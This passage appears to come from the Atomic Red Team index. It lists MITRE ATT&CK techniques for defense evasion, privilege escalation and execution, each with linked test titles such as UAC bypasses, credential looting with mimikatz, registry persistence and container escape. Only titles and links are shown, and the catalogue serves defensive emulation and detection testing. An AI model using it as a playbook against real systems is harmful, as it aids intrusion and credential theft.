- Atomic Test #2: DLL Side-Loading using the dotnet startup hook environment variable [windows]
- T1126 Network Share Connection Removal [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1055.008 Ptrace System Calls [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1055.015 ListPlanting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1484 Domain Policy Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1220 XSL Script Processing](../../T1220/T1220.md)
- Atomic Test #1: MSXSL Bypass using local files [windows]
- Atomic Test #2: MSXSL Bypass using remote files [windows]
- Atomic Test #3: WMIC bypass using local XSL file [windows]
- Atomic Test #4: WMIC bypass using remote XSL file [windows]
- [T1564.001 Hide Artifacts: Hidden Files and Directories](../../T1564.001/T1564.001.md)
- Atomic Test #1: Create a hidden file in a hidden directory [linux, macos]
- Atomic Test #2: Mac Hidden file [macos]
- Atomic Test #3: Create Windows System File with Attrib [windows]
- Atomic Test #4: Create Windows Hidden File with Attrib [windows]
- Atomic Test #5: Hidden files [macos]
- Atomic Test #6: Hide a Directory [macos]
- Atomic Test #7: Show all hidden files [macos]
- Atomic Test #8: Hide Files Through Registry [windows]
- T1578.001 Create Snapshot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1550.001 Application Access Token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1078.004 Valid Accounts: Cloud Accounts](../../T1078.004/T1078.004.md)
- Atomic Test #1: Creating GCP Service Account and Service Account Key [google-workspace, iaas:gcp]
- T1480.001 Environmental Keying [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1564.004 Hide Artifacts: NTFS File Attributes](../../T1564.004/T1564.004.md)
- Atomic Test #1: Alternate Data Streams (ADS) [windows]
- Atomic Test #2: Store file in Alternate Data Stream (ADS) [windows]
- Atomic Test #3: Create ADS command prompt [windows]
- Atomic Test #4: Create ADS PowerShell [windows]
- T1096 NTFS File Attributes [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1055.001 Process Injection: Dynamic-link Library Injection](../../T1055.001/T1055.001.md)
- Atomic Test #1: Process Injection via mavinject.exe [windows]
- Atomic Test #2: WinPwn - Get SYSTEM shell - Bind System Shell using UsoClient DLL load technique [windows]
- T1556 Modify Authentication Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1216 Signed Script Proxy Execution](../../T1216/T1216.md)
- Atomic Test #1: SyncAppvPublishingServer Signed Script PowerShell Command Execution [windows]
- Atomic Test #2: manage-bde.wsf Signed Script Command Execution [windows]
- T1118 InstallUtil [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556.004 Network Device Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1574.004 Dylib Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1601.002 Downgrade System Image [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1078.003 Valid Accounts: Local Accounts](../../T1078.003/T1078.003.md)
- Atomic Test #1: Create local account with admin privileges [windows]
- Atomic Test #2: Create local account with admin privileges - MacOS [macos]
- Atomic Test #3: WinPwn - Loot local Credentials - powerhell kittie [windows]
- Atomic Test #4: WinPwn - Loot local Credentials - Safetykatz [windows]
- T1211 Exploitation for Defense Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1127 Trusted Developer Utilities Proxy Execution](../../T1127/T1127.md)
- Atomic Test #1: Lolbin Jsc.exe compile javascript to exe [windows]
- Atomic Test #2: Lolbin Jsc.exe compile javascript to dll [windows]
- T1218.014 MMC [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1564.010 Process Argument Spoofing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1574.012 Hijack Execution Flow: COR_PROFILER](../../T1574.012/T1574.012.md)
- Atomic Test #1: User scope COR_PROFILER [windows]
- Atomic Test #2: System Scope COR_PROFILER [windows]
- Atomic Test #3: Registry-free process scope COR_PROFILER [windows]
# privilege-escalation
- T1055.011 Extra Window Memory Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1053.005 Scheduled Task/Job: Scheduled Task](../../T1053.005/T1053.005.md)
- Atomic Test #1: Scheduled Task Startup Script [windows]
- Atomic Test #2: Scheduled task Local [windows]
- Atomic Test #3: Scheduled task Remote [windows]
- Atomic Test #4: Powershell Cmdlet Scheduled Task [windows]
- Atomic Test #5: Task Scheduler via VBA [windows]
- Atomic Test #6: WMI Invoke-CimMethod Scheduled Task [windows]
- Atomic Test #7: Scheduled Task Executing Base64 Encoded Commands From Registry [windows]
- Atomic Test #8: Import XML Schedule Task with Hidden Attribute [windows]
- Atomic Test #9: PowerShell Modify A Scheduled Task [windows]
- T1037 Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1150 Plist Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1574.007 Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1044 File System Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1546.013 Event Triggered Execution: PowerShell Profile](../../T1546.013/T1546.013.md)
- Atomic Test #1: Append malicious start-process cmdlet [windows]
- T1514 Elevated Execution with Prompt [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1543 Create or Modify System Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1546.006 LC_LOAD_DYLIB Addition [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1053.007 Kubernetes Cronjob](../../T1053.007/T1053.007.md)
- Atomic Test #1: ListCronjobs [containers]
- Atomic Test #2: CreateCronjob [containers]
- [T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control](../../T1548.002/T1548.002.md)
- Atomic Test #1: Bypass UAC using Event Viewer (cmd) [windows]
- Atomic Test #2: Bypass UAC using Event Viewer (PowerShell) [windows]
- Atomic Test #3: Bypass UAC using Fodhelper [windows]
- Atomic Test #4: Bypass UAC using Fodhelper - PowerShell [windows]
- Atomic Test #5: Bypass UAC using ComputerDefaults (PowerShell) [windows]
- Atomic Test #6: Bypass UAC by Mocking Trusted Directories [windows]
- Atomic Test #7: Bypass UAC using sdclt DelegateExecute [windows]
- Atomic Test #8: Disable UAC using reg.exe [windows]
- Atomic Test #9: Bypass UAC using SilentCleanup task [windows]
- Atomic Test #10: UACME Bypass Method 23 [windows]
- Atomic Test #11: UACME Bypass Method 31 [windows]
- Atomic Test #12: UACME Bypass Method 33 [windows]
- Atomic Test #13: UACME Bypass Method 34 [windows]
- Atomic Test #14: UACME Bypass Method 39 [windows]
- Atomic Test #15: UACME Bypass Method 56 [windows]
- Atomic Test #16: UACME Bypass Method 59 [windows]
- Atomic Test #17: UACME Bypass Method 61 [windows]
- Atomic Test #18: WinPwn - UAC Magic [windows]
- Atomic Test #19: WinPwn - UAC Bypass ccmstp technique [windows]
- Atomic Test #20: WinPwn - UAC Bypass DiskCleanup technique [windows]
- Atomic Test #21: WinPwn - UAC Bypass DccwBypassUAC technique [windows]
- Atomic Test #22: Disable UAC admin consent prompt via ConsentPromptBehaviorAdmin registry key [windows]
- Atomic Test #23: UAC Bypass with WSReset Registry Modification [windows]
- [T1548.003 Abuse Elevation Control Mechanism: Sudo and Sudo Caching](../../T1548.003/T1548.003.md)
- Atomic Test #1: Sudo usage [macos, linux]
- Atomic Test #2: Unlimited sudo cache timeout [macos, linux]
- Atomic Test #3: Disable tty_tickets for sudo caching [macos, linux]
- [T1574.011 Hijack Execution Flow: Services Registry Permissions Weakness](../../T1574.011/T1574.011.md)
- Atomic Test #1: Service Registry Permissions Weakness [windows]
- Atomic Test #2: Service ImagePath Change with reg.exe [windows]
- T1178 SID-History Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1547 Boot or Logon Autostart Execution](../../T1547/T1547.md)
- Atomic Test #1: Add a driver [windows]
- T1013 Port Monitors [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1206 Sudo Caching [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1547.014 Active Setup](../../T1547.014/T1547.014.md)
- Atomic Test #1: HKLM - Add atomic_test key to launch executable as part of user setup [windows]
- Atomic Test #2: HKLM - Add malicious StubPath value to existing Active Setup Entry [windows]
- Atomic Test #3: HKLM - re-execute 'Internet Explorer Core Fonts' StubPath payload by decreasing version number [windows]
- [T1484.002 Domain Trust Modification](../../T1484.002/T1484.002.md)
- Atomic Test #1: Add Federation to Azure AD [azure-ad]
- [T1543.003 Create or Modify System Process: Windows Service](../../T1543.003/T1543.003.md)
- Atomic Test #1: Modify Fax service to run PowerShell [windows]
- Atomic Test #2: Service Installation CMD [windows]
- Atomic Test #3: Service Installation PowerShell [windows]
- Atomic Test #4: TinyTurla backdoor service w64time [windows]
- [T1053.003 Scheduled Task/Job: Cron](../../T1053.003/T1053.003.md)
- Atomic Test #1: Cron - Replace crontab with referenced file [macos, linux]
- Atomic Test #2: Cron - Add script to all cron subfolders [macos, linux]
- Atomic Test #3: Cron - Add script to /var/spool/cron/crontabs/ folder [linux]
- T1165 Startup Items [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1547.012 Print Processors [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1574.001 Hijack Execution Flow: DLL Search Order Hijacking](../../T1574.001/T1574.001.md)
- Atomic Test #1: DLL Search Order Hijacking - amsi.dll [windows]
- T1103 AppInit DLLs [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1053 Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1058 Service Registry Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1055.003 Thread Execution Hijacking](../../T1055.003/T1055.003.md)
- Atomic Test #1: Thread Execution Hijacking [windows]
- [T1546.011 Event Triggered Execution: Application Shimming](../../T1546.011/T1546.011.md)
- Atomic Test #1: Application Shim Installation [windows]
- Atomic Test #2: New shim database files created in the default shim database directory [windows]
- Atomic Test #3: Registry key creation and/or modification events for SDB [windows]
- [T1547.010 Boot or Logon Autostart Execution: Port Monitors](../../T1547.010/T1547.010.md)
- Atomic Test #1: Add Port Monitor persistence in Registry [windows]
- [T1037.002 Boot or Logon Initialization Scripts: Logon Script (Mac)](../../T1037.002/T1037.002.md)
- Atomic Test #1: Logon Scripts - Mac [macos]
- [T1055 Process Injection](../../T1055/T1055.md)
- Atomic Test #1: Shellcode execution via VBA [windows]
- Atomic Test #2: Remote Process Injection in LSASS via mimikatz [windows]
- T1038 DLL Search Order Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1050 New Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1611 Escape to Host](../../T1611/T1611.md)
- Atomic Test #1: Deploy container using nsenter container escape [containers]
- Atomic Test #2: Mount host filesystem to escape privileged Docker container [containers]
- [T1547.009 Boot or Logon Autostart Execution: Shortcut Modification](../../T1547.009/T1547.009.md)
- Atomic Test #1: Shortcut Modification [windows]
- Atomic Test #2: Create shortcut to cmd in startup folders [windows]
- T1182 AppCert DLLs [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1547.005 Boot or Logon Autostart Execution: Security Support Provider](../../T1547.005/T1547.005.md)
- Atomic Test #1: Modify SSP configuration in registry [windows]
- T1181 Extra Window Memory Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1543.004 Create or Modify System Process: Launch Daemon](../../T1543.004/T1543.004.md)
- Atomic Test #1: Launch Daemon [macos]
- [T1574.008 Hijack Execution Flow: Path Interception by Search Order Hijacking](../../T1574.008/T1574.008.md)
- Atomic Test #1: powerShell Persistence via hijacking default modules - Get-Variable.exe [windows]
- [T1484.001 Domain Policy Modification: Group Policy Modification](../../T1484.001/T1484.001.md)
- Atomic Test #1: LockBit Black - Modify Group policy settings -cmd [windows]
- Atomic Test #2: LockBit Black - Modify Group policy settings -Powershell [windows]
- [T1078.001 Valid Accounts: Default Accounts](../../T1078.001/T1078.001.md)
- Atomic Test #1: Enable Guest account with RDP capability and admin privileges [windows]
- Atomic Test #2: Activate Guest Account [windows]
- [T1547.003 Time Providers](../../T1547.003/T1547.003.md)
- Atomic Test #1: Create a new time provider [windows]
- Atomic Test #2: Edit an existing time provider [windows]
- T1183 Image File Execution Options Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1546.005 Event Triggered Execution: Trap](../../T1546.005/T1546.005.md)
- Atomic Test #1: Trap [macos, linux]
- [T1574.006 Hijack Execution Flow: LD_PRELOAD](../../T1574.006/T1574.006.md)
- Atomic Test #1: Shared Library Injection via /etc/ld.so.preload [linux]
- Atomic Test #2: Shared Library Injection via LD_PRELOAD [linux]
- Atomic Test #3: Dylib Injection via DYLD_INSERT_LIBRARIES [macos]
- T1053.001 At (Linux) [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1179 Hooking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1547.011 Plist Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1548 Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1134.002 Create Process with Token](../../T1134.002/T1134.002.md)
- Atomic Test #1: Access Token Manipulation [windows]
- Atomic Test #2: WinPwn - Get SYSTEM shell - Pop System Shell using Token Manipulation technique [windows]
- [T1548.001 Abuse Elevation Control Mechanism: Setuid and Setgid](../../T1548.001/T1548.001.md)
- Atomic Test #1: Make and modify binary from C source [macos, linux]
- Atomic Test #2: Set a SetUID flag on file [macos, linux]
- Atomic Test #3: Set a SetGID flag on file [macos, linux]
- Atomic Test #4: Make and modify capabilities of a binary [linux]
- Atomic Test #5: Provide the SetUID capability to a file [linux]
- [T1547.004 Boot or Logon Autostart Execution: Winlogon Helper DLL](../../T1547.004/T1547.004.md)
- Atomic Test #1: Winlogon Shell Key Persistence - PowerShell [windows]
- Atomic Test #2: Winlogon Userinit Key Persistence - PowerShell [windows]
- Atomic Test #3: Winlogon Notify Key Logon Persistence - PowerShell [windows]
- Atomic Test #4: Winlogon HKLM Shell Key Persistence - PowerShell [windows]
- Atomic Test #5: Winlogon HKLM Userinit Key Persistence - PowerShell [windows]
- [T1546.012 Event Triggered Execution: Image File Execution Options Injection](../../T1546.012/T1546.012.md)
- Atomic Test #1: IFEO Add Debugger [windows]
- Atomic Test #2: IFEO Global Flags [windows]
- Atomic Test #3: GlobalFlags in Image File Execution Options [windows]
- T1055.013 Process Doppelgänging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1574.005 Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1546.008 Event Triggered Execution: Accessibility Features](../../T1546.008/T1546.008.md)
- Atomic Test #1: Attaches Command Prompt as a Debugger to a List of Target Processes [windows]
- Atomic Test #2: Replace binary of sticky keys [windows]
- Atomic Test #3: Create Symbolic Link From osk.exe to cmd.exe [windows]
- T1504 PowerShell Profile [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1055.004 Process Injection: Asynchronous Procedure Call](../../T1055.004/T1055.004.md)
- Atomic Test #1: Process Injection via C# [windows]
- T1138 Application Shimming [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1546.009 Event Triggered Execution: AppCert DLLs](../../T1546.009/T1546.009.md)
- Atomic Test #1: Create registry persistence via AppCert DLL [windows]
- T1055.002 Portable Executable Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1547.015 Boot or Logon Autostart Execution: Login Items](../../T1547.015/T1547.015.md)
- Atomic Test #1: Persistence by modifying Windows Terminal profile [windows]
- Atomic Test #2: Add macOS LoginItem using Applescript [macos]
- [T1134.001 Access Token Manipulation: Token Impersonation/Theft](../../T1134.001/T1134.001.md)
- Atomic Test #1: Named pipe client impersonation [windows]
- Atomic Test #2: `SeDebugPrivilege` token duplication [windows]
- Atomic Test #3: Launch NSudo Executable [windows]
- Atomic Test #4: Bad Potato [windows]
- T1134.003 Make and Impersonate Token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1053.004 Launchd [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1546.003 Event Triggered Execution: Windows Management Instrumentation Event Subscription](../../T1546.003/T1546.003.md)
- Atomic Test #1: Persistence via WMI Event Subscription - CommandLineEventConsumer [windows]
- Atomic Test #2: Persistence via WMI Event Subscription - ActiveScriptEventConsumer [windows]
- Atomic Test #3: Windows MOFComp.exe Load MOF File [windows]
- [T1134.004 Access Token Manipulation: Parent PID Spoofing](../../T1134.004/T1134.004.md)
- Atomic Test #1: Parent PID Spoofing using PowerShell [windows]
- Atomic Test #2: Parent PID Spoofing - Spawn from Current Process [windows]
- Atomic Test #3: Parent PID Spoofing - Spawn from Specified Process [windows]
- Atomic Test #4: Parent PID Spoofing - Spawn from svchost.exe [windows]
- Atomic Test #5: Parent PID Spoofing - Spawn from New Process [windows]
- [T1546.001 Event Triggered Execution: Change Default File Association](../../T1546.001/T1546.001.md)
- Atomic Test #1: Change Default File Association [windows]
- T1055.014 VDSO Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1015 Accessibility Features [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1546.014 Event Triggered Execution: Emond](../../T1546.014/T1546.014.md)
- Atomic Test #1: Persistance with Event Monitor - emond [macos]
- T1502 Parent PID Spoofing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1169 Sudo [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1574.010 Services File Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder](../../T1547.001/T1547.001.md)
- Atomic Test #1: Reg Key Run [windows]
- Atomic Test #2: Reg Key RunOnce [windows]
- Atomic Test #3: PowerShell Registry RunOnce [windows]
- Atomic Test #4: Suspicious vbs file run from startup Folder [windows]
- Atomic Test #5: Suspicious jse file run from startup Folder [windows]
- Atomic Test #6: Suspicious bat file run from startup Folder [windows]
- Atomic Test #7: Add Executable Shortcut Link to User Startup Folder [windows]
- Atomic Test #8: Add persistance via Recycle bin [windows]
- Atomic Test #9: SystemBC Malware-as-a-Service Registry [windows]
- Atomic Test #10: Change Startup Folder - HKLM Modify User Shell Folders Common Startup Value [windows]
- Atomic Test #11: Change Startup Folder - HKCU Modify User Shell Folders Startup Value [windows]
- Atomic Test #12: HKCU - Policy Settings Explorer Run Key [windows]
- Atomic Test #13: HKLM - Policy Settings Explorer Run Key [windows]
- Atomic Test #14: HKLM - Append Command to Winlogon Userinit KEY Value [windows]
- Atomic Test #15: HKLM - Modify default System Shell - Winlogon Shell KEY Value [windows]
- Atomic Test #16: secedit used to create a Run key in the HKLM Hive [windows]
- [T1547.006 Boot or Logon Autostart Execution: Kernel Modules and Extensions](../../T1547.006/T1547.006.md)
- Atomic Test #1: Linux - Load Kernel Module via insmod [linux]
- Atomic Test #2: MacOS - Load Kernel Module via kextload and kmutil [macos]
- Atomic Test #3: MacOS - Load Kernel Module via KextManagerLoadKextWithURL() [macos]
- T1574.013 KernelCallbackTable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1053.006 Scheduled Task/Job: Systemd Timers](../../T1053.006/T1053.006.md)
- Atomic Test #1: Create Systemd Service and Timer [linux]
- Atomic Test #2: Create a user level transient systemd service and timer [linux]
- Atomic Test #3: Create a system level transient systemd service and timer [linux]
- T1157 Dylib Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1574 Hijack Execution Flow [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078 Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1055.012 Process Injection: Process Hollowing](../../T1055.012/T1055.012.md)
- Atomic Test #1: Process Hollowing using PowerShell [windows]
- Atomic Test #2: RunPE via VBA [windows]
- T1068 Exploitation for Privilege Escalation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1546 Event Triggered Execution](../../T1546/T1546.md)
- Atomic Test #1: Persistence with Custom AutodialDLL [windows]
- Atomic Test #2: HKLM - Persistence using CommandProcessor AutoRun key (With Elevation) [windows]
- Atomic Test #3: HKCU - Persistence using CommandProcessor AutoRun key (Without Elevation) [windows]
- [T1546.004 Event Triggered Execution: .bash_profile and .bashrc](../../T1546.004/T1546.004.md)
- Atomic Test #1: Add command to .bash_profile [macos, linux]
- Atomic Test #2: Add command to .bashrc [macos, linux]
- [T1134.005 Access Token Manipulation: SID-History Injection](../../T1134.005/T1134.005.md)
- Atomic Test #1: Injection SID-History with mimikatz [windows]
- T1548.004 Elevated Execution with Prompt [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1547.002 Authentication Package](../../T1547.002/T1547.002.md)
- Atomic Test #1: Authentication Package [windows]
- [T1546.015 Event Triggered Execution: Component Object Model Hijacking](../../T1546.015/T1546.015.md)
- Atomic Test #1: COM Hijacking - InprocServer32 [windows]
- Atomic Test #2: Powershell Execute COM Object [windows]
- Atomic Test #3: COM Hijacking with RunDLL32 (Local Server Switch) [windows]
- Atomic Test #4: COM hijacking via TreatAs [windows]
- [T1574.009 Hijack Execution Flow: Path Interception by Unquoted Path](../../T1574.009/T1574.009.md)
- Atomic Test #1: Execution of program.exe as service with unquoted service path [windows]
- T1166 Setuid and Setgid [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1037.005 Boot or Logon Initialization Scripts: Startup Items](../../T1037.005/T1037.005.md)
- Atomic Test #1: Add file to Local Library StartupItems [macos]
- T1100 Web Shell [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1034 Path Interception [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1037.003 Network Logon Script [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1088 Bypass User Account Control [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1546.010 Event Triggered Execution: AppInit DLLs](../../T1546.010/T1546.010.md)
- Atomic Test #1: Install AppInit Shim [windows]
- [T1546.002 Event Triggered Execution: Screensaver](../../T1546.002/T1546.002.md)
- Atomic Test #1: Set Arbitrary Binary as Screensaver [windows]
- [T1543.001 Create or Modify System Process: Launch Agent](../../T1543.001/T1543.001.md)
- Atomic Test #1: Launch Agent [macos]
- Atomic Test #2: Event Monitor Daemon Persistence [macos]
- T1055.009 Proc Memory [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1519 Emond [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1037.004 Boot or Logon Initialization Scripts: Rc.common](../../T1037.004/T1037.004.md)
- Atomic Test #1: rc.common [macos]
- Atomic Test #2: rc.common [linux]
- Atomic Test #3: rc.local [linux]
- T1134 Access Token Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1543.002 Create or Modify System Process: Systemd Service](../../T1543.002/T1543.002.md)
- Atomic Test #1: Create Systemd Service [linux]
- Atomic Test #2: Create Systemd Service file, Enable the service , Modify and Reload the service. [linux]
- T1547.013 XDG Autostart Entries [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1055.005 Thread Local Storage [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1547.007 Boot or Logon Autostart Execution: Re-opened Applications](../../T1547.007/T1547.007.md)
- Atomic Test #1: Copy in loginwindow.plist for Re-Opened Applications [macos]
- Atomic Test #2: Re-Opened Applications using LoginHook [macos]
- Atomic Test #3: Append to existing loginwindow for Re-Opened Applications [macos]
- [T1574.002 Hijack Execution Flow: DLL Side-Loading](../../T1574.002/T1574.002.md)
- Atomic Test #1: DLL Side-Loading using the Notepad++ GUP.exe binary [windows]
- Atomic Test #2: DLL Side-Loading using the dotnet startup hook environment variable [windows]
- T1160 Launch Daemon [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1055.008 Ptrace System Calls [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1037.001 Boot or Logon Initialization Scripts: Logon Script (Windows)](../../T1037.001/T1037.001.md)
- Atomic Test #1: Logon Scripts [windows]
- T1055.015 ListPlanting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1484 Domain Policy Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1547.008 Boot or Logon Autostart Execution: LSASS Driver](../../T1547.008/T1547.008.md)
- Atomic Test #1: Modify Registry to load Arbitrary DLL into LSASS - LsaDbExtPt [windows]
- [T1078.004 Valid Accounts: Cloud Accounts](../../T1078.004/T1078.004.md)
- Atomic Test #1: Creating GCP Service Account and Service Account Key [google-workspace, iaas:gcp]
- [T1053.002 Scheduled Task/Job: At](../../T1053.002/T1053.002.md)
- Atomic Test #1: At.exe Scheduled task [windows]
- Atomic Test #2: At - Schedule a job [linux]
- [T1055.001 Process Injection: Dynamic-link Library Injection](../../T1055.001/T1055.001.md)
- Atomic Test #1: Process Injection via mavinject.exe [windows]
- Atomic Test #2: WinPwn - Get SYSTEM shell - Bind System Shell using UsoClient DLL load technique [windows]
- [T1546.007 Event Triggered Execution: Netsh Helper DLL](../../T1546.007/T1546.007.md)
- Atomic Test #1: Netsh Helper DLL Registration [windows]
- T1574.004 Dylib Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1078.003 Valid Accounts: Local Accounts](../../T1078.003/T1078.003.md)
- Atomic Test #1: Create local account with admin privileges [windows]
- Atomic Test #2: Create local account with admin privileges - MacOS [macos]
- Atomic Test #3: WinPwn - Loot local Credentials - powerhell kittie [windows]
- Atomic Test #4: WinPwn - Loot local Credentials - Safetykatz [windows]
- [T1574.012 Hijack Execution Flow: COR_PROFILER](../../T1574.012/T1574.012.md)
- Atomic Test #1: User scope COR_PROFILER [windows]
- Atomic Test #2: System Scope COR_PROFILER [windows]
- Atomic Test #3: Registry-free process scope COR_PROFILER [windows]
# execution
- [T1053.005 Scheduled Task/Job: Scheduled Task](../../T1053.005/T1053.005.md)
- Atomic Test #1: Scheduled Task Startup Script [windows]
- Atomic Test #2: Scheduled task Local [windows]
- Atomic Test #3: Scheduled task Remote [windows]
- Atomic Test #4: Powershell Cmdlet Scheduled Task [windows]
- Atomic Test #5: Task Scheduler via VBA [windows]
- Atomic Test #6: WMI Invoke-CimMethod Scheduled Task [windows]
- Atomic Test #7: Scheduled Task Executing Base64 Encoded Commands From Registry [windows]
- Atomic Test #8: Import XML Schedule Task with Hidden Attribute [windows]
- Atomic Test #9: PowerShell Modify A Scheduled Task [windows]
- [T1047 Windows Management Instrumentation](../../T1047/T1047.md)
- Atomic Test #1: WMI Reconnaissance Users [windows]
- Atomic Test #2: WMI Reconnaissance Processes [windows]
- Atomic Test #3: WMI Reconnaissance Software [windows]
- Atomic Test #4: WMI Reconnaissance List Remote Services [windows]
- Atomic Test #5: WMI Execute Local Process [windows]
- Atomic Test #6: WMI Execute Remote Process [windows]
- Atomic Test #7: Create a Process using WMI Query and an Encoded Command [windows]
- Atomic Test #8: Create a Process using obfuscated Win32_Process [windows]
- Atomic Test #9: WMI Execute rundll32 [windows]
- Atomic Test #10: Application uninstall using WMIC [windows]
